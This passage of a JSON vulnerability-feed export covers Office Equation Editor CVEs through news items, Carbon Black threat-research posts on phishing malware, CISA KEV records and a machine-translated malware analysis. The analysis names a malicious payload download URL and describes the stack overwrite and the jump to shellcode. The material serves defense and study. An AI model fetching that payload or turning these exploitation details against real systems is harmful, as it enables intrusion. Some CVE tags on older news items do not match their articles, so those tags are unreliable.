tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers behind Flame can easily clean up compromised computers, according to research by security firm Symantec who found that some attackers have been able to use command-and-control (C&C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then goes on to search the infected computer for every file used by Flame, removes them and even overwrite the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module and StartBrowse, which does the actual deletion of the Flame files. Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered and recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "This video features Tim Rains and Vinny Gullotto of Microsoft discussing the major threats from the second half of 2008.\n", "cvss3": {}, "published": "2009-06-22T10:33:11", "type": "threatpost", "title": "Microsoft Security Intelligence Report: The Vinny and Tim Show", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "href": "https://threatpost.com/microsoft-security-intelligence-report-vinny-and-tim-show-062209/72853/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "carbonblack": [{"lastseen": "2019-12-11T13:20:10", "description": "Trend Micro released a white paper about Tick, a Chinese cyberespionage threat actor targeting east asian countries. The report details several new downloader malware families. VMware Carbon Black Threat Analysis Unit (TAU) reviewed the malware and is providing product rules to detect and identify the malware.\n\n## Behavior Summary\n\nThe Trend Micro report stated that the downloaders were deployed by using right to left override (RTLO) technique or exploiting the CVE-2018-0802 and CVE-2018-0798 vulnerabilities. The downloaders have code which is used to detect antivirus products.\n\n![detect_av.png](https://community.carbonblack.com/t5/image/serverpage/image-id/3220i909392943F49A97C/image-dimensions/548x280?v=1.0)\n\nThe CB ThreatHunter process diagram shows the downloader activity after it is deployed by the dropper. As the dropper just sets the persistence, rebooting is required to run.![cbth_new.png](https://community.carbonblack.com/t5/image/serverpage/image-id/3221i036171C2924BA0A5/image-dimensions/599x283?v=1.0)__\n\nAdditionally, CB Defense will display the malware\u2019s overall triggered TTPs.\n\n![alert_origin.png](https://community.carbonblack.com/t5/image/serverpage/image-id/3222iBBA89170D56E87D8/image-size/large?v=1.0&px=999)__\n\nTo learn more, [click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-Tick-downloaders-Operation-ENDTRADE/ta-p/83641>)\n\nThe post [Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)](<https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-10T15:34:53", "type": "carbonblack", "title": "Threat Analysis Unit (TAU) Threat Intelligence Notification: Tick Downloaders (Operation ENDTRADE)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2019-12-10T15:34:53", "id": "CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "href": "https://www.carbonblack.com/2019/12/10/threat-analysis-unit-tau-threat-intelligence-notification-tick-downloaders-operation-endtrade/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-19T21:36:32", "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of Compromise (IOC)\u2019s, this report covers the key behaviors by aligning to the MITRE ATT&CK Framework. \n\n[_MITRE ATT&CK_](<https://attack.mitre.org/>)_ launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. _This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time where many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown leading to a climate of uncertainty. Unfortunately during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. \n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC\u2019s being produced daily. HIstorically, such as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response of such malware we will be examining the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. \n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. \n\n## **Initial Access **\n\nThis is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is due to the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link.. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram shown below shows a visual representation of the underlying effects of opening this particular email attachment. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details inputted by the end user. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable, which when opened deploys **AgentTesla**. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment name **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe **which when opened, launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan, by leveraging [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT (a technique used for [signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file which is a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) is symptomatic of when an end user opens a phishing email or attachment. There are other specific TTP\u2019s that have been observed with the execution of Coronavirus themed payloads. \n\n### [Powershell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, executed an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries: **csc.exe** and **cvtres.exe**, which are commonly seen in the defense evasion, [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>) tactic. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE\u2019s are: [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims. \n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing number of fake VPN clients and installers that are disguised as malware. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast have recently [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was discovered to be delivering ransomware. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n\n**Figure 12: Snippet showing potential malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map **\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upwards trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write up will be published soon on this new ransomware campaign. \n\n[![](https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png)](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n\n**Figure 14: Coronavirus ransomware message**\n\n## **Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC\u2019s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC\u2019s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&CK Framework will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety or different threats,many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {}, "published": "2020-03-19T20:48:06", "type": "carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0798"], "modified": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0798", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0798.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-0802", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-12-02T18:49:48", "description": "Recently harvested a suffix called doc word document, view the After is actually a rich text format document. In a test environment to open after the discovery of a network connection and executing a program of action, determine the sample is malware document. After a preliminary analysis, found that the sample is CVE-2017-11882 vulnerabilities using a new sample. CVE-2017-11882 vulnerability and CVE-2018-0802 vulnerability based on Office equation editor processing logic, is the nearest office of malicious attacks document by conventional means. On the network for the vulnerability of the Genesis, the use of analysis of already in place, such as 360 days eye laboratory using the Office Equation Editor special processing logic of the newest[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)technical analysis of CVE-2017-11882, as well as Tencent computer housekeeper NDAY vulnerability CVE-2017-11882 and 0Day vulnerability CVE-2018-0802 vulnerability combination of the dissemination of remote control Trojans of the sample analysis and other technical reports. The samples and before each analysis are slightly different, should be CVE-2017-11882 vulnerability and a variant version. \nFirst, the basic operation of the \nExperimental environment: windows 7 x64 sp1, Chinese edition, office 2010 Chinese version. \nThe vulnerability of the sample after opening, the display content of the document is garbled, as shown below. \n! [](https://image.3001.net/images/20181124/1543024815_5bf8b0aff1ceb.png! small) \nIn addition, in the%temp%directory to build and run a named emre. exe executable files. Capture found emre. exe from http://ghthf. cf/cert/ochicha. exe download generated. As shown below. \n! [](https://image.3001.net/images/20181124/1543025083_5bf8b1bb3a590.png! small) \nSecond, the vulnerability to debug \n1, the sample form \nwinhex opens the following two figures shown. The document directly behind the heel to display the content. \n! [](https://image.3001.net/images/20181124/1543025978_5bf8b53ac1bc7.png! small) \nFollowed by that object, as shown below. \n! [](https://image.3001.net/images/20181124/1543025728_5bf8b44012bda.png! small) \n2, RTF, a preliminary analysis of the \nWith rftobj after the analysis of the results is shown below. You can see the clsid for 0002ce02-0000-0000-c000-000000000046 i.e. Microsoft Equation Editor object. \n! [](https://image.3001.net/images/20181124/1543026347_5bf8b6ab810d7.png! small) \n! [](https://image.3001.net/images/20181124/1543026881_5bf8b8c10fb6b.png! small) \nFrom the figure we can see that the object name is\u201ceQuatiON native\u201d, the normal name of the object\u201cEquation Native\u201dfor the case conversion operations, may also be the pursuit of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)one of the effects. \n3, vulnerability debugging \nAccording to various aspects of the vulnerability analysis report, we direct commissioning a vulnerability where a function 0041160F it. \n! [](https://image.3001.net/images/20181124/1543027328_5bf8ba80a5a02.png! small) \nAfter the 11th rep after the operation, as in the following figure, the stack 0x0043F775 be covered. \n! [](https://image.3001.net/images/20181124/1543027588_5bf8bb8428e33.png! small) \n! [](https://image.3001.net/images/20181124/1543027800_5bf8bc58c5a27.png! small) \nAnd EQNEDT32. EXE process 0x0043F775 the value of is C3, happens to be the instruction retn\u3002 \n! [](https://image.3001.net/images/20181124/1543028035_5bf8bd439c8e9.png! small) \nAfter the execution jumps to the shellcode location. As shown below: \n! [](https://image.3001.net/images/20181124/1543028175_5bf8bdcf72dd2.png! small) \n4, the shellcode debugging analysis \nshellcode location in the eQuatiON-native object. \nDivided into two parts, wherein the start location 0\u00d70826, B9 C439E66A shown on figure 0018F354 at the disassembly instructions start to 0851, followed by four bytes 0x0043F7F5\uff08EQNEDT32. EXE process in the RETN instruction is. The second portion of the position in 